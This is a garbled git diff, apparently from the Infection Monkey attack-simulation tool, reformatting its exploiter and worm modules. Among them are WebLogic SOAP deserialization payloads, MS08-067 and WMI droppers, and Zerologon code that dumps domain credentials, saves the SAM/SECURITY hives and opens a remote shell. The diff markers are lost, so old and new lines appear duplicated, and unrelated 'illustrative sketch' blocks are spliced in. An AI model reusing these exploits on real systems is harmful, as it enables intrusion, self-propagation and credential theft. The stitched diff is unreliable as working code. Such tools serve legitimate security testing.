self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
"monkey_path":monkey_path,
"monkey_type":MONKEY_ARG,
"parameters":parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
# we don't have to revert the ulimit because it just applies to the shell obtained by our
# exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)


@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {
"linux": self._config.dropper_target_path_linux,
"win32": self._config.dropper_target_path_win_32,
"win64": self._config.dropper_target_path_win_64,
"linux":self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64,
}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
@ -69,21 +69,27 @@ class WebRCE(HostExploiter):
"""
exploit_config = {}
# dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
# dropper: If true monkey will use dropper parameter that will detach monkey's process
# and try to copy
# it's file to the default destination path.
exploit_config["dropper"] = False
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,
# 'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults
# will be used.
exploit_config["upload_commands"] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home",
# "index.php"]
exploit_config["url_extensions"] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found
# vulnerable.
exploit_config["stop_checking_urls"] = False
# blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
# blind_exploit: If true we won't check if file exist and won't try to get the
# architecture of target.
exploit_config["blind_exploit"] = False
return exploit_config
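To make the keys documented above concrete, a subclass might return something along these lines from get_exploit_config(); the values shown are illustrative examples, not taken from any particular exploiter.

# Illustrative sketch only (not from the commit).
exploit_config = {
    "dropper": True,                           # detach process, copy to default path
    "upload_commands": None,                   # fall back to built-in wget/powershell commands
    "url_extensions": ["index.php", "home"],   # subdirectories to probe (example values)
    "stop_checking_urls": False,               # keep collecting vulnerable URLs
    "blind_exploit": False,                    # still check file existence / architecture
}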
@ -164,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {}
candidate_services.update(
{
service: self.host.services[service]
service:self.host.services[service]
for service in self.host.services
if (
self.host.services[service]
@ -196,11 +202,12 @@ class WebRCE(HostExploiter):
else:
command = commands["windows"]
# Format command
command = command % {"monkey_path": path, "http_path": http_path}
command = command % {"monkey_path":path, "http_path":http_path}
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
"Check upload_monkey function docs before using custom monkey's upload commands."
"Check upload_monkey function docs before using custom monkey's upload "
"commands."
)
return False
return command
@ -225,8 +232,10 @@ class WebRCE(HostExploiter):
def build_potential_urls(self, ports, extensions=None):
"""
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and
extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
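A small sketch of how the ports/extensions inputs described above turn into candidate URLs; the target IP is a made-up example.

# Illustrative sketch only (not from the commit).
ports = [[80, False], [443, True]]
extensions = ["index.php"]
urls = []
for port, is_https in ports:
    scheme = "https" if is_https else "http"
    for extension in extensions or [""]:
        urls.append(f"{scheme}://10.0.0.5:{port}/{extension}")
# -> ['http://10.0.0.5:80/index.php', 'https://10.0.0.5:443/index.php']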
@ -253,7 +262,8 @@ class WebRCE(HostExploiter):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
:param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
:param stop_checking: If we want to continue checking for vulnerable url even though one
is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
@ -330,7 +340,8 @@ class WebRCE(HostExploiter):
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [
port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
@ -350,7 +361,8 @@ class WebRCE(HostExploiter):
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
If you need multiple commands for the same os you can override this method to add backup commands
If you need multiple commands for the same os you can override this method to add backup
commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
@ -360,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path": dest_path,
"http_path": http_path,
"monkey_path":dest_path,
"http_path":http_path,
}
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command)
@ -370,7 +382,8 @@ class WebRCE(HostExploiter):
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows':
WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
@ -389,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command)
self.add_executed_cmd(command)
@ -402,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False:
return resp
else:
return {"response": resp, "path": paths["dest_path"]}
return {"response":resp, "path":paths["dest_path"]}
def change_permissions(self, url, path, command=None):
"""
@ -417,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows")
return True
if not command:
command = CHMOD_MONKEY % {"monkey_path": path}
command = CHMOD_MONKEY % {"monkey_path":path}
try:
resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send()
@ -435,7 +448,8 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path parameter."
"Could not change permission because monkey was not found. Check path "
"parameter."
)
return False
LOG.info("Permission change finished")
@ -460,18 +474,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
)
command = RUN_MONKEY % {
"monkey_path": path,
"monkey_type": DROPPER_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"monkey_type":DROPPER_ARG,
"parameters":monkey_cmd,
}
else:
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port
)
command = RUN_MONKEY % {
"monkey_path": path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -499,7 +513,8 @@ class WebRCE(HostExploiter):
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:param url_to_monkey: Hosted monkey's url. egz :
http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey):
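An illustrative mapping of how the hosted URL described in the docstring above selects a destination path; the function name and the "windows-32"/"windows-64" markers are assumptions made for this sketch.

# Illustrative sketch only (not from the commit).
def pick_upload_path(url_to_monkey, monkey_target_paths):
    if "linux" in url_to_monkey:
        return monkey_target_paths["linux"]
    if "windows-32" in url_to_monkey:
        return monkey_target_paths["win32"]
    if "windows-64" in url_to_monkey:
        return monkey_target_paths["win64"]
    return None

# e.g. pick_upload_path("http://localserver:9999/monkey/windows-32.exe", paths) -> win32 path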
@ -522,7 +537,8 @@ class WebRCE(HostExploiter):
return False
except KeyError:
LOG.error(
'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize '
'Unknown key was found. Please use "linux", "win32" and "win64" keys to '
"initialize "
"custom dict of monkey's destination paths"
)
return False
@ -540,7 +556,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
return {"src_path": src_path, "dest_path": dest_path}
return {"src_path":src_path, "dest_path":dest_path}
def get_default_dropper_path(self):
"""
@ -577,8 +593,10 @@ class WebRCE(HostExploiter):
def are_vulnerable_urls_sufficient(self):
"""
Determine whether the number of vulnerable URLs is sufficient in order to perform the full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a vulnerable URL is for
Determine whether the number of vulnerable URLs is sufficient in order to perform the
full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""


@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15
# Malicious requests' headers:
HEADERS = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"Content-Type":"text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
}
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host):
super(WebLogic201710271, self).__init__(
host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"}
)
def get_exploit_config(self):
@ -160,7 +160,8 @@ class WebLogic201710271(WebRCE):
:param command: command itself
:return: Formatted payload
"""
empty_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
empty_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
@ -195,7 +196,8 @@ class WebLogic201710271(WebRCE):
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
generic_check_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
@ -272,7 +274,8 @@ class WebLogic20192725(WebRCE):
return exploit_config
def execute_remote_monkey(self, url, path, dropper=False):
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
# Without delay exploiter tries to launch monkey file that is still finishing up after
# downloading.
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
@ -289,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False
def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True
@ -307,7 +310,8 @@ class WebLogic20192725(WebRCE):
"""
empty_payload = """
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>


@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP,
}
def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
)


@ -66,7 +66,9 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
)
return False
except Exception as exc:
@ -110,7 +112,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -119,7 +121,7 @@ class WmiExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
)
@ -142,7 +144,8 @@ class WmiExploiter(HostExploiter):
success = True
else:
LOG.debug(
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,


@ -1,6 +1,7 @@
"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""
import logging
@ -54,7 +55,8 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info(
"Exploit not attempted. Target is most likely patched, or an error was encountered."
"Exploit not attempted. Target is most likely patched, or an error was "
"encountered."
)
return False
@ -131,7 +133,8 @@ class ZerologonExploiter(HostExploiter):
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
LOG.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something went wrong."
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
)
return _exploited
@ -194,7 +197,8 @@ class ZerologonExploiter(HostExploiter):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
target=f"{self.dc_name}$@{self.dc_ip}",
# format for DC account - "NetBIOSName$@0.0.0.0"
target_ip=self.dc_ip,
dc_ip=self.dc_ip,
)
@ -221,7 +225,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get some username and its "
f"password's NT hash: {str(e)}"
)
return None
@ -248,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = {
"RID": int(user_RID), # relative identifier
"lm_hash": lmhash,
"nt_hash": nthash,
"RID":int(user_RID), # relative identifier
"lm_hash":lmhash,
"nt_hash":nthash,
}
def store_extracted_creds_for_exploitation(self) -> None:
@ -269,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update(
{
user: {
"username": user,
"password": "",
"lm_hash": lmhash,
"ntlm_hash": nthash,
user:{
"username":user,
"password":"",
"lm_hash":lmhash,
"ntlm_hash":nthash,
}
}
)
@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get original DC password's NT "
f"hash: {str(e)}"
)
finally:
@ -325,7 +331,8 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
@ -339,7 +346,8 @@ class ZerologonExploiter(HostExploiter):
+ "reg save HKLM\\SECURITY security.save"
)
# Get HKLM keys locally (can't run these together because it needs to call do_get()).
# Get HKLM keys locally (can't run these together because it needs to call
# do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")


@ -132,8 +132,10 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# SMBConnection failed. That might be because there was no way to
# log into the
# target system. We just have a last resort. Hope we have tickets
# cached and that they
# will work
LOG.debug(
"SMBConnection didn't work, hoping Kerberos will help (%s)"
@ -162,11 +164,13 @@ class DumpSecrets:
and os.getenv("KRB5CCNAME") is not None
and self.__do_kerberos is True
):
# Giving some hints here when SPN target name validation is set to something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
# Giving some hints here when SPN target name validation is set to
# something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs
# different to cifs/.
LOG.error(
"Policy SPN target name validation might be restricting full DRSUAPI dump."
+ "Try -just-dc-user"
"Policy SPN target name validation might be restricting full "
"DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
# NTDS Extraction we can try regardless of RemoteOperations failing. It might
# still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@ -231,7 +236,8 @@ class DumpSecrets:
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# We don't store the resume file if this error happened, since this error
# is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
"Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
"Something wen't wrong with the DRSUAPI approach. Try again with "
"-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:


@ -35,9 +35,11 @@ class OptionsForSecretsdump:
target=None,
target_ip=None,
):
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
# ../zerologon.py
self.dc_ip = dc_ip
# just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
# just_dc becomes False, and sam, security, and system are assigned in
# get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security


@ -134,8 +134,10 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
"Decoding error detected, consider running chcp.com at the target,\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
"Decoding error detected, consider running chcp.com at the target,"
"\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
"then execute wmiexec.py "
"again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")


@ -22,23 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
"version":1,
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers": {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file": {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "standard",
"filename": None,
"handlers":{
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
"file":{
"class":"logging.FileHandler",
"level":"DEBUG",
"formatter":"standard",
"filename":None,
},
},
"root": {"level": "DEBUG", "handlers": ["console"]},
"root":{"level":"DEBUG", "handlers":["console"]},
}
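As a side note, a dict like LOG_CONFIG above is normally activated with logging.config.dictConfig once the file handler's filename has been filled in; the log path below is an example.

# Illustrative usage sketch only (not from the commit).
import logging.config

LOG_CONFIG["handlers"]["file"]["filename"] = "monkey.log"  # example path
LOG_CONFIG["root"]["handlers"].append("file")              # also log to the file
logging.config.dictConfig(LOG_CONFIG)
logging.getLogger(__name__).debug("logging configured")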
@ -71,8 +72,8 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
"Config file wasn't supplied and default path: %s wasn't found, using internal default"
% (config_file,)
"Config file wasn't supplied and default path: %s wasn't found, using internal "
"default" % (config_file,)
)
print(
@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
# If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
# If log exists but can't be removed it means other monkey is running. This usually
# happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
)
LOG.info(f"version: {get_version()}")


@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" % self._default_server
"Default server: %s is already in command servers list" %
self._default_server
)
def start(self):
@ -219,7 +220,7 @@ class InfectionMonkey(object):
# Order exploits according to their type
self._exploiters = sorted(
self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
if exploiter.RUNS_AGENT_ON_SUCCESS:
break # if adding machine to exploited, won't try other exploits on it
break # if adding machine to exploited, won't try other exploits
# on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
# if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
# if host was exploited, before continue to closing the tunnel ensure the exploited
# host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
)
time.sleep(time_to_sleep)
@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
"A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
"A planned shutdown of the Monkey occurred. Logging the reason and finishing "
"execution."
)
LOG.exception("Planned shutdown, reason:")
@ -341,7 +346,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
DELAY_DELETE_CMD % {"file_path": sys.executable},
DELAY_DELETE_CMD % {"file_path":sys.executable},
stdin=None,
stdout=None,
stderr=None,
@ -393,7 +398,8 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)


@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
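For reference, the netsh_args dict above might be rendered into a command line roughly as sketched below; the program path and the exact quoting are assumptions, not the behavior of _run_netsh_cmd itself.

# Illustrative sketch only (not from the commit).
netsh_args = {"name": "Firewall", "dir": "in", "action": "allow",
              "program": r"C:\Windows\temp\monkey.exe"}  # example program path
cmd = "netsh advfirewall firewall add rule " + " ".join(
    f'{key}="{value}"' for key, value in netsh_args.items()
)
# -> netsh advfirewall firewall add rule name="Firewall" dir="in" action="allow" program="..."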
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name": name}
netsh_args = {"name":name}
netsh_args.update(kwargs)
try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args.update(kwargs)
try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"program": program}
netsh_args = {"program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):


@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
except IOError: # interface is present in routing tables but does not have any assigned IP
except IOError: # interface is present in routing tables but does not have any
# assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]

View File

@ -49,22 +49,21 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
"Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
host
)
"Socket timeout reached, maybe browser service on host: {0} doesnt "
"exist".format(host)
)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
"Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
host
)
"Connection was forcibly closed by the remote host. The host: {0} is "
"rejecting the packet.".format(host)
)
else:
LOG.error(
